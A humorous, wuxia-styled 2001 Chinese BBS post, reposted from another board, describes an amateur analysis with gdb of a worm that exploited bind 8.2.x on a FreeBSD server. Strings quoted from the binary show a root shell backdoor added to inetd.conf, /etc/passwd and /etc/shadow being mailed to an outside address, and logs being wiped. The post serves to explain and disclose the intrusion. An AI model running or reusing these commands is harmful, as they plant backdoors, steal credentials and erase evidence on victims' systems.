大战黑客传之夜审奸细

  发信人: melodies (明天就做窝), 信区: FreeBSD标 题: 大战黑客纪实-4(转)发信站: BBS 水木清华站 (Sun Jul 1 21:02:35 2001)文章出处:北邮BBS 作者 clubk (快乐草包) 看板 FreeBSD 标题 大战黑客记实(4) 时间 Sun Apr 15 00:34:50 2001———————————————————————————————————————(续)要看scan.sh调遣的兵丁rundb和scan可是这两个都是ELF 派的,铁齿钢牙, 嘴不好撬啊….忽然想到营中有一个强悍酷吏……无论官兵窃贼闻之无不胆寒的……..gdb是也!吾与友立刻请出此人, 令之速速审问只听堂上霹雳啪啦….@#$%&^%$….啪啦霹雳….( 哎, 老板限期破案, 用一点刑也是难免的吗)花了几个时辰, 把rundb 和scan打的皮开肉绽终于有了一星半点供词rundb:…..@$*&$)…..我是兔子!我是兔子!……rundb:…(昏死过去了)…..看来还是我们武艺不精, 打的不是地方……看看scan打昏了以后说了什么:scan:…..啊!!!…..我也是…..兔子!!….scan:..Usage: %s [c-block]scan:..Invalid b-rangescan:..Unable to setscan:…..我发誓!…我真的是….兔子!!…..scan:..Invalid IPscan:..Scan completed in %u secondsscan:..Error: %sscan:…(昏死过去了)…..scan:..echo %s >> hosts.log &啪!!惊堂木一响! 有了!gdb 不愧我等厚望啊…这里就是scan的秘密啦!原来他从某个地方接受B 类地址为参数(见scan.sh)搜索完成后将符合某些条件的地址写在hosts.log里最后由hack.sh->bind.sh->bind去处理B 类地址则是由rundb来提供的(参见scan.sh的供述)估计rundb是一个搜索路由器的网路表的家伙专门为scan提供可以访问的B类地址我等人心大振, 再接再厉,把dobind.sh里用到的bind也拖过来暴打一顿:bind:..我不会说的….bind:..用什么刑也没用….bind:..欧! 啊!~~~~~….bind:..啊….难道..没有人..知道..美人计吗…啊!~~~~bind:..system does not seem to be vulnerablebind:..system seems to be running bind 8.2.xbind:..ptr is too low to be successfully exploited啊! exploit! 攻击! 而且是攻击bind 8.2.x的忽然我等想起了去年底今年初江湖上流传的小道消息有关bind最新发现的一些严重的安全漏洞主要是由于程序设计的小小缺陷, 导致易受缓冲区溢出攻击堆栈溢处后程序出错, 黑客的代码以被攻击程序的身份得到系统的执行缓冲区溢出攻击是江湖上最著名的攻击方式乃是一门武林绝学, 与葵花宝典齐名(当然,不用自宫的说)具体的解释我就不细说了, 而且我也不一定说得清楚各位自己看官去找些武林秘籍看吧(记住: 万万不可自宫啊!!)继续审问….bind:…..(昏死过去了)…..bind:..PATH=’/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin’;bind:..export PATH;export TERM=vt100;bind:..echo ‘10008 stream tcp nowait root /bin/sh sh’ >>/etc/inetd.conf;bind:..killall -HUP inetd;ifconfig -a>system.data;bind:..cat /etc/passwd >>system.data;cat /etc/shadow >>system.data;bind:..mail xxxxxxx@263.netbind:..rm -fr /.bash_history;echo >/var/log/messages;bind:..rm -rf /var/log/maillog;bind:…..(又昏死过去了)…..天哪! 他都干了些什么!各位看官, 看来这个江湖黑客不仅仅是一个一般的侠客从程序的设计水平来看, 乃是这世上一等一的高手不过, 从黑客的邮件地址看, 又不象啊如果国内有了这等高手….哎呀….大喜啊….中华之腾飞指日可待啊…….可是, 如果是有人不过是捡了别人写的武林套路拿来比划几下就号称的了武林真传….也不是不可能啊现在, 大营中重要大员的信息(/etc/passwd; /etc/shadow)泄漏无疑黑客还把大营的的所有通信接口信息弄去(ifconfig -a)寄到自己的免费信箱里去了并且顺便给自己开了一个后门(修改/etc/inetd.conf)至此, 黑客的手下的来路和目的都比较清楚了他利用bind的安全漏洞, 攻击并取得大营主管之权限(root)然后安插他的兵丁入住大营器械房(/dev)…..这些人有从此营出发去探其他的各路营寨, 找到有同样漏洞的营寨,这些兵丁自动地再行攻击, 每次都取得各路营寨的重要信息飞书传邮, 一路辗转, 直到黑客的老巢!呜呼! 吾友之营寨, 命在旦夕矣!,人生最大的错误是不断担心会犯错

大战黑客传之夜审奸细

相关文章:

你感兴趣的文章:

标签云: